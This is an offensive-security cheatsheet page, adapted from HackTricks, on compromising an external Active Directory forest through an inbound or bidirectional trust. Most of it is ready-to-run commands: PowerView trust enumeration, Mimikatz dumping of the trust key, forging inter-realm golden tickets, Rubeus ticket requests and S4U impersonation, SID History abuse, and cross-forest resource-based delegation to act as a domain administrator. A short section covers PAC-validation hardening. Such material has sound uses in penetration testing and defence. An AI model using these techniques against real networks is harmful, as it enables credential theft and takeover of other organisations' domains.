daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

external-forest-domain-oneway-inbound.md (8677B)


      1 ---
      2 title: "External Forest Domain - OneWay (Inbound) or bidirectional"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # External Forest Domain - OneWay (Inbound) or bidirectional
     14 
     15 In this scenario an external domain is trusting you (or both are trusting each other), so you can get some kind of access over it.
     16 
     17 ## Enumeration
     18 
     19 First of all, you need to **enumerate** the **trust**:
     20 
     21 ```bash
     22 Get-DomainTrust
     23 SourceName      : a.domain.local   --> Current domain
     24 TargetName      : domain.external  --> Destination domain
     25 TrustType       : WINDOWS-ACTIVE_DIRECTORY
     26 TrustAttributes :
     27 TrustDirection  : Inbound          --> Inboud trust
     28 WhenCreated     : 2/19/2021 10:50:56 PM
     29 WhenChanged     : 2/19/2021 10:50:56 PM
     30 
     31 # Get name of DC of the other domain
     32 Get-DomainComputer -Domain domain.external -Properties DNSHostName
     33 dnshostname
     34 -----------
     35 dc.domain.external
     36 
     37 # Groups that contain users outside of its domain and return its members
     38 Get-DomainForeignGroupMember -Domain domain.external
     39 GroupDomain             : domain.external
     40 GroupName               : Administrators
     41 GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=domain,DC=external
     42 MemberDomain            : domain.external
     43 MemberName              : S-1-5-21-3263068140-2042698922-2891547269-1133
     44 MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
     45                           DC=external
     46 
     47 # Get name of the principal in the current domain member of the cross-domain group
     48 ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
     49 DEV\External Admins
     50 
     51 # Get members of the cros-domain group
     52 Get-DomainGroupMember -Identity "External Admins" | select MemberName
     53 MemberName
     54 ----------
     55 crossuser
     56 
     57 # Lets list groups members
     58 ## Check how the "External Admins" is part of the Administrators group in that DC
     59 Get-NetLocalGroupMember -ComputerName dc.domain.external
     60 ComputerName : dc.domain.external
     61 GroupName    : Administrators
     62 MemberName   : SUB\External Admins
     63 SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
     64 IsGroup      : True
     65 IsDomain     : True
     66 
     67 # You may also enumerate where foreign groups and/or users have been assigned
     68 # local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
     69 
     70 # Additional trust hygiene checks (AD RSAT / AD module)
     71 Get-ADTrust -Identity domain.external -Properties SelectiveAuthentication,SIDFilteringQuarantined,SIDFilteringForestAware,TGTDelegation,ForestTransitive
     72 ```
     73 
     74 > `SelectiveAuthentication`/`SIDFiltering*` let you quickly see if cross-forest abuse paths (RBCD, SIDHistory) are likely to work without extra prerequisites.<sup>[[2]](#references)</sup>
     75 
     76 In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**.
     77 
     78 ## Initial Access
     79 
     80 If you **couldn't** find any **special** access of your user in the other domain, you can still go back to the AD Methodology and try to **privesc from an unprivileged user** (things like kerberoasting for example):
     81 
     82 You can use **Powerview functions** to **enumerate** the **other domain** using the `-Domain` param like in:
     83 
     84 ```bash
     85 Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
     86 ```
     87 
     88 
     89 [.](/hacktricks/windows-hardening/active-directory-methodology/overview)
     90 
     91 ## Impersonation
     92 
     93 ### Logging in
     94 
     95 Using a regular method with the credentials of the users who is has access to the external domain you should be able to access:
     96 
     97 ```bash
     98 Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator
     99 ```
    100 
    101 ### SID History Abuse
    102 
    103 You could also abuse [**SID History**](/hacktricks/windows-hardening/active-directory-methodology/sid-history-injection) across a forest trust.
    104 
    105 If a user is migrated **from one forest to another** and **SID Filtering is not enabled**, it becomes possible to **add a SID from the other forest**, and this **SID** will be **added** to the **user's token** when authenticating **across the trust**.
    106 
    107 > [!WARNING]
    108 > As a reminder, you can get the signing key with
    109 >
    110 > ```bash
    111 > Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local
    112 > ```
    113 
    114 You could **sign with** the **trusted** key a **TGT impersonating** the user of the current domain.
    115 
    116 ```bash
    117 # Get a TGT for the cross-domain privileged user to the other domain
    118 Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
    119 
    120 # Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
    121 ## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
    122 Rubeus.exe asktgs /service:cifs/dc.domain.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap
    123 
    124 # Now you have a TGS to access the CIFS service of the domain controller
    125 ```
    126 
    127 ### Full way impersonating the user
    128 
    129 ```bash
    130 # Get a TGT of the user with cross-domain permissions
    131 Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap
    132 
    133 # Get a TGT from the current domain for the target domain for the user
    134 Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap
    135 
    136 # Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
    137 ## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
    138 Rubeus.exe asktgs /service:cifs/dc.domain.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap
    139 
    140 # Now you have a TGS to access the CIFS service of the domain controller
    141 ```
    142 
    143 ### Cross-forest RBCD when you control a machine account in the trusting forest (no SID filtering / selective auth)
    144 
    145 If your foreign principal (FSP) lands you in a group that can write computer objects in the trusting forest (e.g., `Account Operators`, custom provisioning group), you can configure **Resource-Based Constrained Delegation** on a target host of that forest and impersonate any user there:
    146 
    147 ```bash
    148 # 1) From the trusted domain, create or compromise a machine account (MYLAB$) you control
    149 # 2) In the trusting forest (domain.external), set msDS-AllowedToAct on the target host for that account
    150 Set-ADComputer -Identity victim-host$ -PrincipalsAllowedToDelegateToAccount MYLAB$
    151 # or with PowerView
    152 Set-DomainObject victim-host$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$sidbytes_of_MYLAB}
    153 
    154 # 3) Use the inter-forest TGT to perform S4U to victim-host$ and get a CIFS ticket as DA of the trusting forest
    155 Rubeus.exe s4u /ticket:interrealm_tgt.kirbi /impersonate:EXTERNAL\Administrator /target:victim-host.domain.external /protocol:rpc
    156 ```
    157 
    158 This only works when **SelectiveAuthentication is disabled** and **SID filtering** does not strip your controlling SID. It is a fast lateral path that avoids SIDHistory forging and is often missed in trust reviews.<sup>[[2]](#references)</sup>
    159 
    160 ### PAC validation hardening
    161 
    162 PAC signature validation updates for **CVE-2024-26248**/**CVE-2024-29056** add signing enforcement on inter-forest tickets. In **Compatibility mode**, forged inter-realm PAC/SIDHistory/S4U paths can still work on unpatched DCs. In **Enforcement mode**, unsigned or tampered PAC data crossing a forest trust is rejected unless you also hold the target forest trust key. Registry overrides (`PacSignatureValidationLevel`, `CrossDomainFilteringLevel`) can weaken this while they remain available.<sup>[[1]](#references)</sup>
    163 
    164 ## References
    165 
    166 - [1] [Microsoft KB5037754 – PAC validation changes for CVE-2024-26248 & CVE-2024-29056](https://support.microsoft.com/en-au/topic/how-to-manage-pac-validation-changes-related-to-cve-2024-26248-and-cve-2024-29056-6e661d4f-799a-4217-b948-be0a1943fef1)
    167 - [2] [MS-PAC spec – SID filtering & claims transformation details](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/55fc19f2-55ba-4251-8a6a-103dd7c66280)